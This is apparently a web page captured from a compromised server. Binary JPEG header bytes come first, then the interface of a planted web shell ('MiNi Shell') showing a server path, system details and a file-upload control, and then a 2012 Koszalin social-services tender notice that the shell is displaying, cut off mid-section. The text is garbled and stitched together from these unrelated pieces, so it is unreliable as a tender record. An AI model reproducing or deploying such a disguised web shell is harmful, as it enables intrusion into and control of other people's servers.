JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/home/vmanager/www/common/web/tenders/20120413/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/home/vmanager/www/common/web/tenders/20120413/84309-N-2012.html

<p class="kh_header"><b>Koszalin: Realizacja ścieżki udziału uczestników projektu Koszaliński Program Integracji Społecznej - START, współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, w zajęciach Klubu Integracji Społecznej.</b><br>
<b>Numer ogłoszenia: 84309 - 2012; data zamieszczenia: 13.04.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej , Al. Monte Cassino 2, 75-412 Koszalin, woj. zachodniopomorskie, tel. 094 3160300, faks 0-94 3160328.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> mops.koszalin.ibip.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Realizacja ścieżki udziału uczestników projektu Koszaliński Program Integracji Społecznej - START, współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, w zajęciach Klubu Integracji Społecznej..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Realizacja ścieżki udziału uczestników projektu Koszaliński Program Integracji Społecznej- START, współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, w zajęciach Klubu Integracji Społecznej polegającej na organizacji określonych poniżej działań:
Działanie A - Indywidualne doradztwo zawodowe (dla grupy I),
Działanie B - Trening Komunikacji Interpersonalnej,
Działanie C - Warsztaty aktywnego poszukiwania pracy (dla grupy I),
Działanie D - Spotkania Grupy Wsparcia,
Działanie E - Spotkania Grupy Samopomocowej,
Działanie F - Wsparcie asystenta osoby niepełnosprawnej,
Działanie G - Wsparcie psychologa (dla grupy I),
Działanie H - Wsparcie prawnika (dla grupy I),
Działanie I - Trening Komunikacji Interpersonalnej tzw. Szkoła dla rodzica,
Działanie J - Trzy 3-dniowe wyjazdowe warsztaty rodzinne,
Działanie K - Wsparcie pedagoga,
Działanie L - Wsparcie psychologa (dla grupy II),
Działanie M - Wsparcie prawnika (dla grupy II),
Działanie N - Indywidualne doradztwo zawodowe (dla grupy III),
Działanie O - Warsztaty aktywnego poszukiwania pracy (dla grupy III),
Działanie P - Wsparcie prawnika (dla grupy III).
Przedmiotem zamówienia jest realizacja zajęć dla uczestników Klubu Integracji Społecznej polegająca na zorganizowaniu ścieżki udziału uczestników projektu Koszaliński Program Integracji Społecznej- START, współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.
Uczestnicy projektu realizujący zajęcia w Klubie Integracji Społecznej zostali podzieleni na 3 grupy. Każda z grup będzie realizować odrębną ścieżkę udziału w zajęciach:
 Grupa I - osoby niepełnosprawne - do 28 osób (w tym 2 osoby kontynuujące udział):
-	osoby bezrobotne i lub nieaktywne zawodowo i lub zatrudnione, korzystające ze świadczeń pomocy społecznej, w wieku aktywności zawodowej, posiadające orzeczenie o stopniu niepełnosprawności
(lub równoważne); głównie osoby z zaburzeniami psychicznymi, osoby z zaburzeniami układu ruchu, osoby z zaburzeniami układu oddechowego i krążenia;
-	zajęcia grupowe odbywać się będą w 2 podgrupach liczących od 13 do 15 osób każda

Szczegółowy opis przedmiotu zamówienia dla poszczególnych etapów
Etap I - 26 osób
   Działanie A
I Indywidualne doradztwo zawodowe 
- 1 spotkanie x 2 godz. dla każdego uczestnika= 26 osób x 2 godz.= 52 godz.
Cel: ustalenie grupy uczestników gotowych do opracowania IPD i udziału w kursach szkoleniach zawodowych.
II Indywidualne doradztwo zawodowe 
- 2 spotkania x 3 godz. x podgrupa uczestników wyłoniona podczas I rozmowy doradczej
- do 12 osób; czyli maks. 12 osób x 6 godz. = 72 godz.
Cel: opracowanie Indywidualnego Planu Działania ze wskazaniem szkoleń kursów zawodowych podnoszących kwalifikacje przy uwzględnieniu danych dot. aktualnych potrzeb rynku pracy.
Etap II - 26 osób
Działanie B
TRENING KOMUNIKACJI INTERPERSONALNEJ:
Cel: skuteczność komunikacji interpersonalnej (komunikacja werbalna i niewerbalna), integracja uczestników, nabycie praktycznych umiejętności załatwiania spraw urzędowych, wygląd zewnętrzny, czystość i higiena osobista, zasady prowadzenia gospodarstwa domowego.
Bloki tematyczne w ramach Treningu Komunikacji Interpersonalnej:
- komunikacja werbalna (15 godz. dla każdej podgrupy = 30 godz.,  tj. 3 dni/3 godz. dziennie zajęć teoretycznych dla każdej podgrupy oraz 4 wyjścia po 1,5 godz. każde - wyjścia razem z prowadzącym zajęcia).
Tematyka: 
- wprowadzenie w zasady komunikacji interpersonalnej; 
- trening podstawowych reguł komunikacji interpersonalnej; 
- zapoznanie uczestników z zasadami skutecznego porozumiewania się, itp.;      
- praktyczne zastosowanie zajęć z komunikacji werbalnej nastąpi w trakcie wspólnych (grupowych) wizyt - nabycie umiejętności załatwiania spraw urzędowych (po 1 wizycie dla każdej podgrupy w PUP, w Urzędzie Skarbowym, ZUS, zarządcy mieszk.). Organizacja i przeprowadzenie po stronie zleceniobiorcy.
- komunikacja niewerbalna (15 godz. dla każdej podgrupy = 30 godz., tj. 3 dni 4 godz. dziennie zajęć teoretycznych dla każdej podgrupy oraz 1 wyjście 3-godzinne razem z prowadzącym zajęcia).
Tematyka: 
- rola mowy ciała w komunikacji interpersonalnej, 
- bariery komunikacyjne, itp.;
- praktyczne zastosowanie komunikacji interpersonalnej zostanie zaprezentowane podczas wyjścia do teatru (1 wyjście dla każdej podgrupy na przedstawienie otwarte w instytucji kultury na terenie Koszalina). Zleceniobiorca zapewnia bilety, organizację i opiekę nad grupą.

- wygląd zewnętrzny, czystość i higiena osobista; prowadzenie gospodarstwa domowego (15 godz. dla każdej podgrupy = 30 godz., tj. 3 dni 4 godz. dla każdej podgrupy oraz 1 wyjście 3-godzinne - razem z prowadzącym zajęcia.
Tematyka: 
- profilaktyka prozdrowotna (zasady żywienia w zależności od wieku, dieta, aktywność fizyczna, higiena osobista, itp.);
- prowadzenie gosp. domowego (gospodarowanie budżetem domowym, racjonalizacja wydatków, zadłużenia, możliwości spłaty zadłużenia - np. odpracowanie zadłużenia za czynsz, zamiana mieszkań; oszczędzanie np. liczniki przedpłatowe; pułapki kredytowe, itp.). 
- praktyczne zastosowanie zajęć nastąpi w trakcie wspólnych (grupowych) wizyt w restauracji
(1 wizyta dla każdej podgrupy z możliwością konsumpcji). Wybór lokalu, rezerwacja, oraz zapewnienie posiłku w postaci napoju i deseru oraz opieka nad grupą po stronie zleceniobiorcy.

Etap III - 12 osób
Działanie C
WARSZTATY AKTYWNEGO POSZUKIWANIA PRACY
Cel: przygotowanie do skuteczniejszego działania na rynku pracy, indywidualna analiza sytuacji zawodowych poszczególnych uczestników
- 3 dni x 4 godz. dziennie = 12 godz.
- zajęcia dla podgrupy uczestników (maks. 12 osób) wyłonionej podczas I spotkania z doradcą zawodowym.
Tematyka:
- omówienie aktualnej sytuacji na rynku pracy; 
- prawa i obowiązki pracowników, w tym prawa kobiet; 
- wymogi pracodawców wobec potencjalnych pracowników; 
- elastyczne formy zatrudnienia; 
- prowadzenie własnej działalności gospodarczej i źródła pozyskiwania dotacji.

	Etap IV - 12 osób
Działanie D
SPOTKANIA GRUP WSPARCIA
Cel: umocnienie poczucia własnej wartości, wymiana doświadczeń, wzmocnienie gotowości do samodzielnych działań w kierunku poprawy sytuacji życiowej
- 1 spotkanie w miesiącu dla grupy maks. 12 osób przez okres 4 miesięcy = łącznie 4 spotkania x 3 godz. = 12 godz.; 
- spotkania dla osób zgłaszających się na indywidualne doradztwo psychologiczne, chętnych
do udziału w grupie i wskazanych przez psychologa;
- zajęcia odbywać się powinny równolegle do etapów I-IV

Etap V - 12 osób
Działanie E
SPOTKANIA GRUPY SAMOPOMOCOWEJ
Cel: pomoc samym sobie przy wsparciu mentora, umocnienie poczucia własnej wartości, wymiana doświadczeń, zwiększenie motywacji do zmiany, integracja uczestników
- spotkania grupy samopomocowej dla grupy maks. 12 osób przez okres 4 miesięcy = łącznie
4 spotkania x 3 godz. = 12 godz. 
- wyłonienie lidera oraz grupy następuje przez osobę prowadzącą trening komunikacji interpersonalnej - nie mniej niż 6 osób chętnych
- zajęcia odbywać się powinny równolegle do etapów I-IV

Równocześnie należy zapewnić możliwość korzystania z usług:
Działanie F
Usługi asystenta osoby niepełnosprawnej (dla 2 osób x 10 godz. przez okres 4 miesięcy
= 80 godz.)
Działanie G
Usługi psychologa - dyżur w siedzibie KIS (ok. 50 godz. miesięcznie przez okres 4 miesięcy
= 200 godz.);
Działanie H
Usługi prawnika - dyżur w siedzibie KIS (ok. 50 godz. miesięcznie przez okres 4 miesięcy
= 200 godz.).

Grupa II - do 36 osób (w tym 2 osoby kontynuujące udział)
-	osoby z problemami w sprawach opiekuńczo-wychowawczych, głównie rodziny niepełne lub wielodzietne, zagrożone pozbawieniem ograniczeniem praw rodzicielskich;
-	osoby bezrobotne i lub nieaktywne zawodowo i lub zatrudnione, korzystające ze świadczeń pomocy społecznej, w wieku aktywności zawodowej;
-	zajęcia grupowe odbywać się będą w 3 podgrupach liczących od 11 do 13 osób każda 

Szczegółowy opis przedmiotu zamówienia dla poszczególnych etapów

Etap I - 36 osób
Działanie I
TRENING KOMUNIKACJI INTERPERSONALNEJ TZW. SZKOŁA DLA RODZICA:
Cel: nabycie praktycznych umiejętności budowania prawidłowych relacji z dziećmi, podniesienie kompetencji społecznych w zakresie wychowywania dzieci w kierunku przeciwdziałania utracie lub ograniczeniu praw rodzicielskich
- cykl 10 spotkań po 6 godz. dla każdej podgrupy; razem: 10 spotkań x 6 godz. x 3 podgrupy = 180 godz.
- zajęcia w formie warsztatowej, przy aktywnym udziale uczestników (ćwiczenia, zadania domowe, ankiety, scenki itp.)
Tematyka:
- jak prawidłowo budować relacje rodzinne, czyli tzw. Szkoła dla rodzica 
- Co zrobić żeby dziecko zaczęło mnie słuchać?
- Granice. Konieczność stawiania zakazów i nakazów w procesie wychowawczym.
-  Jak zachęcić dziecko do współpracy?
- Kara czy nagroda?
- Dowartościować dziecko - po co?
- Rola dziecka i rola rodzica.
- Jak budować prawidłowe relacje pomiędzy rodzeństwem?
- Jak pomóc dziecku, by radziło sobie z trudnymi uczuciami?
- Zazdrość pomiędzy rodzeństwem - jak sobie radzić i jak zapobiegać?
- Kłótnie, konflikty miedzy rodzeństwem - jak sobie radzić i jak zapobiegać?
- Co zrobić, aby dziecko było samodzielne?
- Problemy wieku dorastania.
- Przemoc - jak radzić sobie z własnymi emocjami i uczuciami oraz uczuciami i emocjami dzieci?

Etap II - 30 osób
Działanie J
Trzy 3-DNIOWE WYJAZDOWE WARSZTATY RODZINNE
Cel: umacnianie i poprawa więzi rodzinnych, wzmocnienie kompetencji życiowych i zwiększenie aktywności społecznej i zawodowej oraz poprawa relacji rodzinnych
Tematyka:
1.	Profilaktyka przemocy oraz radzenia sobie ze stresem  - 14 godz.
2.	Profilaktyka zdrowia - 14 godz.
3.	Rozwijanie i odkrywanie swoich możliwości (z doradcą zawodowym i psychologiem klinicznym) - 14 godz.
Wyjazd dla dzieci i rodziców - uczestnik + około 2 osoby towarzyszące. 
W każdym z warsztatów będzie brało udział maks. 30 osób.
Każdy wyjazd będzie miał charakter edukacyjno-integracyjny, a zajęcia prowadzone będą dwutorowo, tzn. dla dzieci i dla rodziców.

Równocześnie należy zapewnić możliwość korzystania z usług:
Działanie K
Usługi pedagoga - dla maks.10 rodzin - na zasadzie asystentury (10 godz. miesięcznie x 10 rodzin
= 100 godz. miesięcznie przez okres 4 m-cy = 400 godz.);
Działanie L
Usługi psychologa - dyżur w siedzibie KIS (ok. 50 godz. miesięcznie przez okres 4 miesięcy
= 200 godz.);
Działanie M
Usługi prawnika - dyżur w siedzibie KIS (ok. 50 godz. miesięcznie przez okres 4 miesięcy
= 200 godz.) - usługa dla grupy II i III.

Grupa III - do 36 osób bezrobotnych nieaktywnych zawodowo 
-	os. bezrobotne i lub os. nieaktywne zawodowo i lub os. zatrudnione (w tym os. długotrwale bezrobotne, os. bezdomne, os. niepełnosprawne), które cechuje brak lub niski poziom motywacji, brak lub nieadekwatność kwalifikacji do potrzeb rynku pracy; os. korzystające ze świadczeń pomocy społecznej; os. w wieku aktywności zawodowej;
-	zajęcia grupowe odbywać się będą w 3 podgrupach liczących od 11 do 13 osób każda 

Szczegółowy opis przedmiotu zamówienia dla poszczególnych etapów

Etap I - 36 osób
Działanie N
Indywidualne doradztwo zawodowe 
Cel:  opracowanie Indywidualnego Planu Działania i określenia dalszej ścieżki zawodowej uczestników ze wskazaniem szkoleń kursów zawodowych podnoszących kwalifikacje przy uwzględnieniu danych dot. aktualnych potrzeb rynku pracy.
- 2 spotkania x 3 godz. x 36 uczestników = 216 godz.

Etap II - 36 osób
Działanie O
WARSZTATY AKTYWNEGO POSZUKIWANIA PRACY:
Cel: przygotowanie do skuteczniejszego działania na rynku pracy, analiza indywidualnej sytuacji zawodowej
- 5 dni x 5 godz. dziennie = 25 godz. dla każdej podgrupy; łącznie: 75 godz.
Tematyka:
-  aktualna sytuacja na rynku pracy; 
- prawa i obowiązki pracowników, w tym prawa kobiet; 
- wymogi pracodawców wobec potencjalnych pracowników; 
- elastyczne formy zatrudnienia; 
- prowadzenie własnej działalności gospodarczej i źródła pozyskiwania dotacji.

TARGI PRACY:
Cel: spotkanie z potencjalnymi pracodawcami w celu zapoznania się z aktualnymi ofertami pracy i wymogami pracodawców - we współpracy z PUP Koszalin
- 1 spotkanie x 3 godz. dla całej grupy III - 36 osób

Równocześnie należy zapewnić możliwość korzystania z usług:

Działanie P

Usługi prawnika - dyżur w siedzibie KIS (ok. 50 godz. miesięcznie przez okres 4 miesięcy
=  200 godz.) - usługa dla grupy II i III..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających, do 50% wartości zamówienia podstawowego, polegających na powtórzeniu tych samych zajęć w przypadku, jeżeli zamówiona ilość okaże się niewystarczająca.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 85.30.00.00-2, 85.32.00.00-8, 85.12.12.70-6, 80.57.00.00-0, 85.31.23.20-8, 79.14.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie przewiduje konieczności wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek posiadania uprawnień do wykonywania określonej działalności lub czynności zostanie uznany za spełniony, jeżeli Wykonawca złoży oświadczenie, o którym mowa w pkt 11 ppkt 1 lit a SIWZ, oraz dołączy do oferty wpis do Rejestru Instytucji Szkoleniowych.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek posiadania wiedzy i doświadczenia zostanie uznany za spełniony, jeżeli Wykonawca złoży oświadczenie, o którym mowa w pkt 11 ppkt 1 lit b SIWZ oraz dołączy do oferty wykaz wykonanych usług, z którego będzie wynikało, iż zrealizował z należytą starannością w okresie ostatnich trzech lat (lub krótszym) zamówienie:
- polegające na jednoczesnym  świadczeniu usług doradczych i szkoleniowych dla grupy minimum 50 osób zagrożonych wykluczeniem społecznym,
lub
- świadczeniu usług doradczych dla grupy minimum 50 osób zagrożonych wykluczeniem społecznym i usług szkoleniowych dla grupy minimum 50 osób zagrożonych wykluczeniem społecznym, równolegle w okresie jednego roku kalendarzowego.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek dysponowanie odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia zostanie uznany za spełniony, jeżeli Wykonawca złoży oświadczenie, o którym mowa w pkt 11 ppkt 1 lit c SIWZ oraz dołączy do oferty wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, z którego będzie wynikało,że Wykonawca dysponuje:

-	co najmniej 4 osobami posiadającymi wykształcenie wyższe i kwalifikacje w zakresie doradztwa zawodowego oraz min. 2 lata doświadczenia w prowadzeniu grupowych warsztatów w zakresie aktywizacji zawodowej i doradztwa indywidualnego zawodowego dla osób bezrobotnych nieaktywnych zawodowo  niepełnosprawnych,w których łącznie wzięło udział co najmniej 30 osób - dla działań A, C, N, O;
-	co najmniej 3 osobami posiadającymi wykształcenie wyższe oraz doświadczenie polegające na przeprowadzeniu grupowych zajęć psychospołecznych, w których łącznie wzięło udział co najmniej 30 osób - dla działań B, I, J;
-	co najmniej 1 osobą posiadająca kwalifikacje oraz doświadczenie w zakresie prowadzenia grupowej terapii psychospołecznej (psycholog terapeuta), w których łącznie wzięło udział co najmniej 30 osób - dla działań D, E;
-	co najmniej 2 osobami posiadającymi 1 rok doświadczenia asystenta osoby niepełnosprawnej - dla działania F;
-	co najmniej 2 osobami posiadającymi wykształcenie wyższe psychologiczne oraz 2 lata doświadczenia indywidualnego doradztwa psychologicznego - dla działań G, L;
-	co najmniej 2 osobami posiadającymi wykształcenie wyższe prawne (radca prawny)
oraz 2 lata doświadczenia w udzielaniu porad prawnych - dla działań H, M, P;
-	co najmniej 1 osobą posiadającą wykształcenie wyższe pedagogiczne oraz 2 lata doświadczenia w pracy pedagoga - dla działania K.
Do wyżej wymienionych osób wymagane jest oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia posiadają wymagane uprawnienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek sytuacji ekonomicznej i finansowej zostanie uznany za spełniony, jeżeli Wykonawca złoży oświadczenie o spełnianiu warunku, o którym mowa w pkt 11 ppkt 1 lit d SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana postanowień zawartych w umowie może nastąpić za zgodą obu stron wyrażoną w formie pisemnej, pod rygorem nieważności, i na zasadach, o których mowa w art. 144 ust.1 ustawy - Prawo zamówień publicznych z dnia 29.01.2004r. (t.j. Dz. U. z 2010 r. Nr 113, poz. 759  z późn. zm.)
 Zamawiający zgodnie z art. 144 ust. 1 ustawy - Prawo zamówień publicznych przewiduje możliwości dokonania zmiany umowy w formie aneksów w niżej wymienionych przypadkach:
A. Zmiany rzutujące na termin realizacji:
-	 za zgodą Zamawiającego termin realizacji może ulec wydłużeniu (przedłużająca się procedura przetargowa, kataklizmy i siła wyższa, strajki itp., jeżeli mają wpływ na wykonanie przedmiotu zamówienia). 
B. Zmiany rzutujące na wynagrodzenie:
- dopuszcza się możliwość zmniejszenia liczby osób skierowanych do udziału w ramach działań B, C, I, J, O w przypadku braku zapotrzebowania ze strony uczestników projektu; jednak nie więcej niż o 10% docelowej liczby osób, określonej w SIWZ,
